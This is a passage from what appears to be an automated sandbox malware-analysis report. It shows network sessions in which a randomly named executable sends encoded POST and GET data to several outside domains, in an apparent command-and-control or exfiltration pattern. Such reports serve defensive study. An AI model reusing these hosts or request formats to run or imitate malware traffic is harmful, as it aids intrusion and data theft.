                                              Data Raw: 34 64 56 34 33 74 41 3d 57 65 33 65 49 30 41 4b 34 4c 47 32 30 57 32 2f 33 4f 4a 66 37 62 5a 30 48 4b 30 30 6d 65 4a 77 74 70 65 57 77 37 61 71 6d 46 45 2f 69 45 61 43 51 74 37 33 45 2f 4f 49 47 79 42 37 48 2f 47 65 65 4f 30 41 35 33 34 38 68 45 39 6b 71 47 2f 2f 6b 48 51 50 52 41 62 43 77 71 4c 42 58 76 50 61 73 44 2f 70 77 56 76 34 49 79 53 62 6a 33 59 7a 37 34 37 4d 4b 33 56 61 54 2f 67 55 45 34 67 33 6f 63 42 63 77 5a 59 4e 52 30 4d 32 2b 6d 59 78 2f 38 70 54 41 49 4f 56 61 63 69 62 41 4b 31 63 67 45 39 6a 50 59 37 58 53 42 6a 6d 72 58 4c 53 4e 4c 38 33 65 2f 44 30 77 5a 70 69 78 75 55 2b 6d 65 38 68 6d 4e 50 41 2f 6f 76 4b 35 62 4c 62 47 55 59 33 4c 44 52 65 44 49 76 33 6c 37 71 78 6d 41 71 70 4d 56 68 53 59 70 77 4e 47 6d 52 57 51 70 5a 7a 39 2b 6a 45 6a 68 42 2b 31 57 4e 63 4d 6b 78 71 30 73 32 53 6d 4d 36 58 71 6d 34 55 77 79 62 34 67 4f 50 65 36 54 57 76 55 38 69 42 46 71 4e 55 71 48 34 35 49 6a 49 30 77 51 51 4b 45 6d 52 72 49 57 33 75 64 56 6b 36 70 32 39 4e 36 59 67 67 36 64 45 33 5a 6e [TRUNCATED]
                                              Data Ascii: 4dV43tA=We3eI0AK4LG20W2/3OJf7bZ0HK00meJwtpeWw7aqmFE/iEaCQt73E/OIGyB7H/GeeO0A5348hE9kqG//kHQPRAbCwqLBXvPasD/pwVv4IySbj3Yz747MK3VaT/gUE4g3ocBcwZYNR0M2+mYx/8pTAIOVacibAK1cgE9jPY7XSBjmrXLSNL83e/D0wZpixuU+me8hmNPA/ovK5bLbGUY3LDReDIv3l7qxmAqpMVhSYpwNGmRWQpZz9+jEjhB+1WNcMkxq0s2SmM6Xqm4Uwyb4gOPe6TWvU8iBFqNUqH45IjI0wQQKEmRrIW3udVk6p29N6Ygg6dE3ZniOuu2W5vIqL697cg0qzYorZMqCAM1BTRRtyklOAtD8TWrAExCTwSrTZS15WZyG/ZqQSwkk9UBSHcF9zquHBB5Bio11f3h7POBuE3l0IpXem/RA60Ov3+EWPWJ427YiccdK3cMs5KiK81gchCh4ZZ987S5uDjzq0jkI6IzOYO5c9Df68BZHQHi3rikaCqwttXJ6RkCyzbKmd7x+/cQIpa42s0hVdcLYlL+pk7e8ZovUHZW1mGoXSdnju64i0fp921421JcjRvSACzpz3B8B6cNBM/ODJxzBEHrZuM049OHK+IYdxJ75JRI88pxKYLpuHCBgn67vMAeUK1EF9aI8YAxtCJVbHuPvXjEvle5OwoqLTMVnay/08nS+V1rcxqSCNDpQG2SMzGq1cwzHA6L3V5ziWs9obq+Ictb9Wjz3fpH8Dq5cDutm+wTL/0rBUhcAJXwb1Jwe//jE06g1DqDoE5G/8wD5IrMFuVJwuCj4FSNuZT9gtaI4YJOEsJqK7kJZGhMdgY4y+2Mm2CJdDODU7HCU0/nSJHOE7nP+TxDP+bQJCLnseZqPReGIVKN6eg3IQTKiBCmMcdR+P6+hQtyRovjlGh2ZykQGxUrlcpYeI5x6RLaM738Zh7kKz5BkeObzlNdCHhoyZfFth4QdNcfekErn7MAohkKLUdLL [TRUNCATED]
                                              Jul 1, 2024 16:18:26.795411110 CEST1236INHTTP/1.1 200 OK
                                              Date: Mon, 01 Jul 2024 14:18:26 GMT
                                              Server: Apache
                                              Vary: Accept-Encoding
                                              Content-Encoding: gzip
                                              Content-Length: 4981
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 1f 8b 08 00 00 00 00 00 00 03 ed 5c cd 73 1b b7 92 3f 2b 55 f9 1f 10 ba 1c 59 b5 02 bf f4 2d 4b ca 73 6c e5 3d af e3 8f 8d bc 49 6d 2e 2e cc 0c 48 42 9c 01 e6 01 33 14 c9 3c df 77 ab d6 f7 cd fa b2 3a fa a0 ca 61 6f af ea e5 42 e9 ff da 06 30 43 ce 0c 87 12 a9 8f ac f3 e1 84 d4 0c 06 e8 6e 00 dd bf ee 06 c0 d9 eb 44 81 7f f0 e9 27 9f 7e b2 d7 a1 c4 83 ab a5 3d 87 28 8a 3a 92 b6 f6 2b b5 8a 29 09 68 44 90 db 21 52 d1 68 bf 12 47 2d bc 5d 31 8d 96 f6 22 16 f9 f4 e0 d1 e3 d7 4f bf 3d 44 cd f5 55 a4 aa b2 2a aa 7b 35 fb c0 56 32 ed 39 09 e8 7e a5 c7 e8 49 28 64 54 41 ae e0 11 e5 40 ef 84 79 51 67 df a3 3d e6 52 6c 6e 56 11 e3 2c 62 c4 c7 ca 25 3e dd 6f 64 c4 b0 64 9e d1 c1 89 90 9e ca 90 99 aa f3 84 2a 57 b2 30 62 82 67 aa 4d 89 3a d5 ee 51 1c 75 84 5c a8 c9 cb 13 4e 2f 6d 81 d2 f1 fa 0c 63 d4 22 d0 55 c1 91 8a 88 8c 10 c6 86 9a cf 78 17 49 ea ef 57 48 18 fa 14 47 22 76 3b 58 d7 ab 20 c5 86 54 ed 57 36 b6 fa 1b 5b 95 64 6a 3a 51 14 aa dd 5a ad 1d b3 2a 71 23 d6 a3 cd f5 aa 3b ac b1 a0 5d d3 ad 6a a4 b9 [TRUNCATED]
                                              Data Ascii: \s?+UY-Ksl=Im..HB3<w:aoB0CnD'~=(:+)hD!RhG-]1"O=DU*{5V29~I(dTA@yQg=RlnV,b%>odd*W0bgM:Qu\N/mc"UxIWHG"v;X TW6[dj:QZ*q#;]j-6!oWYoo_VG~1phs6}utF}&\-nlh-2S4nX@+Y;ux]Zv=w6;jnchZNf|E3h_3>~ks|%K@r:4LhS4j|H"5C5*5?EjxZ/z[6]kZ[Avq^m\BD#D"IB}h`rB.Wu.W\@4M.cP-$,}=`.X.KAJDm!>%!S~"!}uv-g>k*vtLJUA K~)wr*QGTQ5B.&RR-,G=,B[UC|iaQdLoFDu^;C=eN~g##AU@#*QqYUh@!P4Z4X*]X#m}QWHxA0vc mD6aM [TRUNCATED]
                                              Jul 1, 2024 16:18:26.795455933 CEST1236INData Raw: ec f3 94 66 59 95 94 af a5 51 2e 4b bd 5c 10 68 b2 50 97 1a f0 a4 94 90 ad 90 d0 2a 1b 88 6c 2b 4f 8a d0 13 27 1c 07 94 c7 49 1b 8f a9 d0 27 a0 06 2d 9f 26 cc f5 15 f6 98 a4 ae 9d 21 98 db 38 b0 f3 0f 4a 24 61 ba 40 20 18 0f 25 7c e6 a1 7b f5 ba
                                              Data Ascii: fYQ.K\hP*l+O'I'-&!8J$a@ %|{MdB%DhG4uI\F:qm)@CpJ:B1hUnJ6J|}J&]k*$V\+L.JKLs)\i[=C*]H3/hY^:_bmM,C/#mE/isb
                                              Jul 1, 2024 16:18:26.795474052 CEST448INData Raw: 01 2e 08 14 01 fe 8e 3e 70 a2 95 1d 1d 53 34 84 e4 a6 cd 14 e8 4f 8f f0 d1 29 0a 25 74 e8 e2 47 ea 71 e6 46 bd d1 59 80 6c 03 d1 1b 7d e8 08 a4 a3 bf d1 a9 1f 5f cd b0 32 39 c3 a1 79 55 f7 6a e1 35 2d a2 54 33 7c 90 a1 10 6d 5f a6 48 76 5b 4b 4f
                                              Data Ascii: .>pS4O)%tGqFYl}_29yUj5-T3|m_Hv[KO<,_HR|-cJ99X7v\90wNz}p[*o55eme-t_&-dSwx40s"YBi6 fIH5@^
                                              Jul 1, 2024 16:18:26.795705080 CEST1236INData Raw: 6f cf ff fb e2 bf 9e be 9e 8a cd 0a fd cb 0e a1 0e 11 9f 7a 29 a5 c4 65 20 33 b0 fb 95 6c 82 93 6b 75 42 9d 99 8d 9a 8d 89 cd d4 b4 d8 37 f5 03 e6 7b 1a 09 2e c3 fb ab f1 fa 0a 5c 46 28 73 93 4c 91 85 e5 19 10 33 e9 73 61 39 05 9a 61 97 ea dd d6
                                              Data Ascii: oz)e 3lkuB7{.\F(sL3sa9al4Vj^Qu]YS25,Csa,.dFjY*udXXkT$4'eZ"VY6JV<5AAZ>2#o|
                                              Jul 1, 2024 16:18:26.795875072 CEST1025INData Raw: c8 b1 5f b1 07 19 12 6a 02 0c 11 a2 5a 57 6f 0b 33 6c e7 16 37 d7 d3 9d 4d b7 43 dd 2e 20 6c 36 69 34 5b e5 a5 42 a5 bb 77 97 48 61 1a 6b 19 20 0c bd 52 88 ac 26 18 b0 7c 89 4c 45 30 45 5d 13 65 4e 12 15 b0 34 0f e8 7a 53 d9 6e 1a 13 a9 b3 e3 14
                                              Data Ascii: _jZWo3l7MC. l6i4[BwHak R&|LE0E]eN4zSntlfL21.!"4}xrXaHv0?)TK?1~>:3$gp1 -5?<})4n?{SyKbJ%D3fr^=w/


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              36192.168.2.54976681.95.96.29803608C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 1, 2024 16:18:28.632405043 CEST532OUTGET /vi6c/?4dV43tA=bcf+LDcyoYCm+QyU3/UN8JBlUcMDsPN1iNWsx7umrkQm3W+qfOHyOayxGzxcStXTe9ogwFYflhpGlkCNjFINeirDlZuuOL3Enw+3v27XAzPfiFhmkrPFAnkPRuNZJaNv/Q==&3hkl=slNhbLXpBjO8vl HTTP/1.1
                                              Host: www.hydrogenmovie.com
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Connection: close
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                              Jul 1, 2024 16:18:29.343560934 CEST1236INHTTP/1.1 200 OK
                                              Date: Mon, 01 Jul 2024 14:18:29 GMT
                                              Server: Apache
                                              Vary: Accept-Encoding
                                              Connection: close
                                              Transfer-Encoding: chunked
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 35 39 61 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 62 61 73 65 20 68 72 65 66 3d 22 2f 22 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 41 43 54 49 56 45 20 32 34 2c 20 73 2e 72 2e 6f 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 4b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 44 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 41 43 54 49 56 45 20 32 34 2c 20 73 2e 72 2e 6f 2e 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 41 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 41 43 54 49 56 45 20 32 34 2c 20 73 2e 72 2e 6f 2e 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 4f 77 6e 65 72 [TRUNCATED]
                                              Data Ascii: 59a4<html><head><base href="/"><meta charset="utf-8"><title>ACTIVE 24, s.r.o.</title><meta name="viewport" content="width=device-width, initial-scale=1"><meta name="Keywords" content=""><meta name="Description" content="ACTIVE 24, s.r.o."><meta name="Author" content="ACTIVE 24, s.r.o."><meta name="Owner" content="ACTIVE 24, s.r.o. ">... favicon start --><link rel="apple-touch-icon" sizes="57x57" href="https://gui.active24.cz/img/icon/a24-apple-favicon-57x57.png"><link rel="apple-touch-icon" sizes="60x60" href="https://gui.active24.cz/img/icon/a24-apple-favicon-60x60.png"><link rel="apple-touch-icon" sizes="72x72" href="https://gui.active24.cz/img/icon/a24-apple-favicon-72x72.png"><link rel="apple-touch-icon" sizes="76x76" href="https://gui.active24.cz/img/icon/a24-apple-favicon-76x76.png"><link rel="apple-touch-icon" sizes="114x114" href="https://gui.active24.cz/img/icon/a24-apple-favicon-114x114.png"><link rel="apple-touch-icon" sizes="120 [TRUNCATED]
                                              Jul 1, 2024 16:18:29.343588114 CEST224INData Raw: 6f 6e 2f 61 32 34 2d 61 70 70 6c 65 2d 66 61 76 69 63 6f 6e 2d 31 32 30 78 31 32 30 2e 70 6e 67 22 3e 0d 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 31 34 34 78 31 34 34 22 20
                                              Data Ascii: on/a24-apple-favicon-120x120.png"><link rel="apple-touch-icon" sizes="144x144" href="https://gui.active24.cz/img/icon/a24-apple-favicon-144x144.png"><link rel="apple-touch-icon" sizes="152x152" href="https://gui.active
                                              Jul 1, 2024 16:18:29.343597889 CEST1236INData Raw: 32 34 2e 63 7a 2f 69 6d 67 2f 69 63 6f 6e 2f 61 32 34 2d 61 70 70 6c 65 2d 66 61 76 69 63 6f 6e 2d 31 35 32 78 31 35 32 2e 70 6e 67 22 3e 0d 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65
                                              Data Ascii: 24.cz/img/icon/a24-apple-favicon-152x152.png"><link rel="apple-touch-icon" sizes="180x180" href="https://gui.active24.cz/img/icon/a24-apple-favicon-180x180.png"><link rel="icon" type="image/png" sizes="192x192" href="https://gui.active24
                                              Jul 1, 2024 16:18:29.343655109 CEST1236INData Raw: 2f 6c 61 6e 64 69 6e 67 2e 63 73 73 22 3e 0d 0a 0d 0a 09 3c 73 74 79 6c 65 3e 0d 0a 09 09 40 69 6d 70 6f 72 74 20 75 72 6c 28 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d
                                              Data Ascii: /landing.css"><style>@import url(https://fonts.googleapis.com/css?family=Titillium+Web:400,700,900,600,300&subset=latin,latin-ext);@font-face {font-family: 'active24-icons';src: url('https://gui.active24.cz/font/active
                                              Jul 1, 2024 16:18:29.343667030 CEST1236INData Raw: 65 3b 0d 0a 09 09 09 74 6f 70 3a 20 34 72 65 6d 3b 0d 0a 09 09 09 70 61 64 64 69 6e 67 3a 20 31 35 70 78 3b 0d 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0d 0a 09 09 7d 0d 0a 0d 0a 09 09 2e 6c 61 6e
                                              Data Ascii: e;top: 4rem;padding: 15px;background-color: #ffffff;}.lang-item {font-size: 1rem;background-color: #ffffff;color: #00b8ea;text-align: left;line-height: 23px;padding: 7px;text-transfor
                                              Jul 1, 2024 16:18:29.343678951 CEST1236INData Raw: 20 7b 0d 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 75 72 6c 28 68 74 74 70 73 3a 2f 2f 67 75 69 2e 61 63 74 69 76 65 32 34 2e 63 7a 2f 69 6d 67 2f 77 65 62 6d 61 69 6c 5f 69 6b 6f 6e 79 5f 76 6c 61 6a 6b 79 2e 70 6e 67 29 20 2d 31 35 70 78
                                              Data Ascii: {background: url(https://gui.active24.cz/img/webmail_ikony_vlajky.png) -15px -238px no-repeat}.dropdown-toggle::after {height: 100%;right: 10px;top: 45%;position: absolute;content: "";border-top: .
                                              Jul 1, 2024 16:18:29.343893051 CEST1236INData Raw: 39 30 70 78 3b 0d 0a 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 2d 34 35 70 78 3b 0d 0a 09 09 7d 0d 0a 09 3c 2f 73 74 79 6c 65 3e 0d 0a 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 68 70 20 68 70 31 35 22 3e 0d
                                              Data Ascii: 90px;margin-top: -45px;}</style></head><body class="hp hp15"><header class="header"><div class="header__container"><a class="header__logo" href="https://www.active24.com" role="button"></a><div class="heade
                                              Jul 1, 2024 16:18:29.343904972 CEST1236INData Raw: 6c 69 73 68 3c 2f 61 3e 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 09 09 09 09 09 09 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 09 09 09 09 09 09 09 09 09 09 3c 62 75 74 74 6f 6e 20 63 6c 61 73 73 3d 22 6c 61 6e 67 2d 69 74 65 6d 20 6c 61 6e 67 2d 65 73 22 3e
                                              Data Ascii: lish</a></span></button><button class="lang-item lang-es"><span><a href="/DOMAIN/es/index.php">Espaol</a></span></button><button class="lang-item lang-nl"><span><a hre
                                              Jul 1, 2024 16:18:29.343916893 CEST1024INData Raw: 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 61 63 74 69 76 65 32 34 2e 63 6f 6d 22 3e 41 43 54 49 56 45 20 32 34 3c 2f 61 3e 2e 3c 2f 70 3e 0d 0a 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 3c 2f 64 69
                                              Data Ascii: "https://www.active24.com">ACTIVE 24</a>.</p></div></div></div></div><div class="block__illu overflow-hidden"><div class="block__image" id="image"><img alt=""src="https://gui.active24.cz/img/default
                                              Jul 1, 2024 16:18:29.343928099 CEST1236INData Raw: 64 6f 6d 61 69 6e 2f 61 76 61 69 6c 61 62 69 6c 69 74 79 2f 6c 69 73 74 22 0d 0a 09 09 09 09 09 63 6c 61 73 73 3d 22 69 6e 6c 69 6e 65 2d 66 6f 72 6d 20 69 6e 73 69 74 65 2d 63 6f 6e 74 72 6f 6c 73 2d 63 6f 6e 74 61 69 6e 65 72 20 6d 62 2d 30 22
                                              Data Ascii: domain/availability/list"class="inline-form insite-controls-container mb-0"method="GET"novalidate><div class="inline-form__item inline-form__item--label"><h2 class="insite-only inline-form__title">REGISTRA
                                              Jul 1, 2024 16:18:29.348726034 CEST1236INData Raw: 76 20 63 6c 61 73 73 3d 22 77 72 61 70 2d 6c 69 73 74 20 76 2d 73 70 61 63 65 2d 2d 62 6f 74 74 6f 6d 20 72 6f 77 2d 66 6c 65 78 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 2d 63 65 6e 74 65 72 22 3e 0d 0a 09 09 09 09 09 09 09 0d 0a 09 09 09
                                              Data Ascii: v class="wrap-list v-space--bottom row-flex justify-content-center"><div class="wrap-list__item"><div class="box box--tight h-100"><div class="box__container h-flex"><div class="text-center v-


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              37192.168.2.549767103.224.182.246803608C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 1, 2024 16:18:35.366411924 CEST773OUTPOST /n983/ HTTP/1.1
                                              Host: www.atmpla.net
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Origin: http://www.atmpla.net
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 208
                                              Content-Type: application/x-www-form-urlencoded
                                              Referer: http://www.atmpla.net/n983/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                              Data Raw: 34 64 56 34 33 74 41 3d 54 38 52 48 63 73 75 4e 59 31 53 6e 71 55 48 33 44 51 53 2b 77 7a 39 57 50 52 79 38 2f 61 77 62 6b 35 62 76 42 62 74 32 6b 69 67 6a 69 56 45 36 53 4d 50 46 35 41 75 33 47 47 79 6c 6b 54 6c 64 57 46 73 51 4e 35 67 54 4d 52 64 76 72 45 6c 54 33 78 6b 76 58 74 45 4e 6e 76 42 2f 6f 6d 35 4f 75 44 36 50 78 55 4c 4a 48 32 53 50 58 68 33 32 6b 75 6d 43 75 62 67 4c 30 6c 71 4d 70 6d 6d 49 70 51 35 53 46 7a 78 4f 45 59 59 31 71 2f 47 2b 6a 67 76 6f 6f 46 32 63 46 44 52 61 37 4b 5a 6f 42 30 46 4a 6e 30 6d 48 70 6d 59 54 33 70 79 42 63 6f 56 63 4a 74 4b 41 4b 36 32 50 4b 6f 33 41 6c 4f 62 76 4e 36 49 3d
                                              Data Ascii: 4dV43tA=T8RHcsuNY1SnqUH3DQS+wz9WPRy8/awbk5bvBbt2kigjiVE6SMPF5Au3GGylkTldWFsQN5gTMRdvrElT3xkvXtENnvB/om5OuD6PxULJH2SPXh32kumCubgL0lqMpmmIpQ5SFzxOEYY1q/G+jgvooF2cFDRa7KZoB0FJn0mHpmYT3pyBcoVcJtKAK62PKo3AlObvN6I=
                                              Jul 1, 2024 16:18:35.999718904 CEST333INHTTP/1.1 302 Found
                                              date: Mon, 01 Jul 2024 14:18:35 GMT
                                              server: Apache
                                              set-cookie: __tad=1719843515.1468331; expires=Thu, 29-Jun-2034 14:18:35 GMT; Max-Age=315360000
                                              location: http://ww16.atmpla.net/n983/?sub1=20240702-0018-3502-bc81-6d3bd567f235
                                              content-length: 2
                                              content-type: text/html; charset=UTF-8
                                              connection: close
                                              Data Raw: 0a 0a
                                              Data Ascii:


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              38192.168.2.549768103.224.182.246803608C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 1, 2024 16:18:37.901422977 CEST793OUTPOST /n983/ HTTP/1.1
                                              Host: www.atmpla.net
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Origin: http://www.atmpla.net
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 228
                                              Content-Type: application/x-www-form-urlencoded
                                              Referer: http://www.atmpla.net/n983/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                              Data Raw: 34 64 56 34 33 74 41 3d 54 38 52 48 63 73 75 4e 59 31 53 6e 70 30 58 33 4d 54 36 2b 34 7a 39 5a 57 52 79 38 31 36 77 66 6b 35 48 76 42 61 5a 6d 6b 51 55 6a 69 30 30 36 52 4f 33 46 36 41 75 33 4f 6d 79 73 70 7a 6b 52 57 46 52 76 4e 34 4d 54 4d 52 35 76 72 46 56 54 33 43 4d 73 57 39 45 44 7a 66 42 35 6c 47 35 4f 75 44 36 50 78 55 75 73 48 79 32 50 55 52 48 32 6e 4c 53 42 6e 37 67 4d 33 6c 71 4d 34 32 6d 4d 70 51 35 30 46 79 74 6f 45 61 51 31 71 37 4f 2b 6b 78 76 76 79 56 32 61 42 44 51 47 2f 62 6b 36 4c 45 35 4a 6d 57 79 46 36 57 30 30 2f 2f 66 72 47 4b 64 30 61 4e 6d 34 61 70 2b 34 62 59 57 70 2f 74 4c 66 54 74 64 56 74 69 31 66 57 37 52 65 6c 4c 57 58 48 4e 59 4c 51 35 6f 35
                                              Data Ascii: 4dV43tA=T8RHcsuNY1Snp0X3MT6+4z9ZWRy816wfk5HvBaZmkQUji006RO3F6Au3OmyspzkRWFRvN4MTMR5vrFVT3CMsW9EDzfB5lG5OuD6PxUusHy2PURH2nLSBn7gM3lqM42mMpQ50FytoEaQ1q7O+kxvvyV2aBDQG/bk6LE5JmWyF6W00//frGKd0aNm4ap+4bYWp/tLfTtdVti1fW7RelLWXHNYLQ5o5
                                              Jul 1, 2024 16:18:38.533639908 CEST333INHTTP/1.1 302 Found
                                              date: Mon, 01 Jul 2024 14:18:38 GMT
                                              server: Apache
                                              set-cookie: __tad=1719843518.3662828; expires=Thu, 29-Jun-2034 14:18:38 GMT; Max-Age=315360000
                                              location: http://ww16.atmpla.net/n983/?sub1=20240702-0018-38ab-b3fe-5f182fd55e69
                                              content-length: 2
                                              content-type: text/html; charset=UTF-8
                                              connection: close
                                              Data Raw: 0a 0a
                                              Data Ascii:


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              39192.168.2.549769103.224.182.246803608C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 1, 2024 16:18:40.486275911 CEST1810OUTPOST /n983/ HTTP/1.1
                                              Host: www.atmpla.net
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Origin: http://www.atmpla.net
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 1244
                                              Content-Type: application/x-www-form-urlencoded
                                              Referer: http://www.atmpla.net/n983/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                              Data Raw: 34 64 56 34 33 74 41 3d 54 38 52 48 63 73 75 4e 59 31 53 6e 70 30 58 33 4d 54 36 2b 34 7a 39 5a 57 52 79 38 31 36 77 66 6b 35 48 76 42 61 5a 6d 6b 51 73 6a 69 43 6f 36 54 70 6a 46 37 41 75 33 41 47 79 68 70 7a 6c 4c 57 46 35 72 4e 34 51 44 4d 54 78 76 71 6a 42 54 78 7a 4d 73 64 39 45 44 78 66 42 34 6f 6d 35 66 75 43 57 4c 78 55 2b 73 48 79 32 50 55 53 50 32 7a 75 6d 42 6c 37 67 4c 30 6c 71 4c 70 6d 6d 30 70 51 51 42 46 79 5a 65 45 71 77 31 70 61 79 2b 6d 48 7a 76 35 56 32 59 4d 6a 51 4f 2f 62 70 6b 4c 48 64 2f 6d 58 48 67 36 58 41 30 75 76 61 48 43 49 52 44 46 4f 79 41 58 36 69 34 45 74 7a 50 68 72 4b 72 52 71 31 58 77 68 56 75 5a 66 74 63 6f 76 50 61 61 70 30 50 52 66 46 59 62 42 6c 37 44 7a 55 31 74 58 4e 63 67 7a 79 6d 34 53 2f 43 63 36 45 53 38 67 66 68 47 54 45 50 77 49 37 70 4e 35 53 62 57 2f 45 64 59 74 45 76 6c 43 34 6f 42 68 66 6f 35 75 63 45 4e 4e 64 62 6d 63 2f 4a 65 37 34 4a 42 58 33 47 69 77 7a 43 58 59 53 78 34 62 34 72 73 47 5a 70 63 6b 6c 6b 52 5a 74 77 54 74 34 71 56 4e 74 6e 69 6d [TRUNCATED]
                                              Data Ascii: 4dV43tA=T8RHcsuNY1Snp0X3MT6+4z9ZWRy816wfk5HvBaZmkQsjiCo6TpjF7Au3AGyhpzlLWF5rN4QDMTxvqjBTxzMsd9EDxfB4om5fuCWLxU+sHy2PUSP2zumBl7gL0lqLpmm0pQQBFyZeEqw1pay+mHzv5V2YMjQO/bpkLHd/mXHg6XA0uvaHCIRDFOyAX6i4EtzPhrKrRq1XwhVuZftcovPaap0PRfFYbBl7DzU1tXNcgzym4S/Cc6ES8gfhGTEPwI7pN5SbW/EdYtEvlC4oBhfo5ucENNdbmc/Je74JBX3GiwzCXYSx4b4rsGZpcklkRZtwTt4qVNtnim1Hf3WL1HQ+rvoAcRcdUUvIYy25tEw7dqgdkiCuAKUAwAyZNQwSd6sbddlIVrRv63eh2+P2dklSgiKdL/Ony3YXwjHwigFAkOTJlEJWeWRXZkWqbD5goeYnHvvyu6HiWo9Sy18EyjmFU44LH9TI/yi33/12TgnG1ttiRemb+2nWbt1m/uaAjPfKyuLD8NDz6QFdrN1zqBRaX2aMsb3ZYlISiU/VWsW7w4XTt+IWwYFBrZLfRkcNugziTWpEfd7irNfqI3w2Z6ey/NuybhDsqDn3A5iIe0QMdzQ5igbbpp/LTK3QutcGIFNvEZ24xOZ25PpfFd55zu0H0I/pJffvKqfvJzS1uwie2QbtoxtNWS7KvfQzXaxtemU8RpHEP7EPUP/bFoEG+7oBu2auzaHRgEM/9GXi9WTZD6/0G1ohM6+xdx25T46tBwRJVEnRGyVJ/3uIhGHeoAjGQhNgK6gmWD5K4rVT/I//B8jerI9dd7PBtK+emlc6rkPlXe+L7GV/PkdoWtENOF8iFVxwzBCHKLDEUxqEEvb5HgfovaXwfN3aNVy1ay+kBvwxDDCki6K7RA35lOigYhKfu+m/mSM0usBogk2RB4Ng0RDJE8nGaYyjq58Q46AL2UY6UtcZFgp+WGDBRELk+q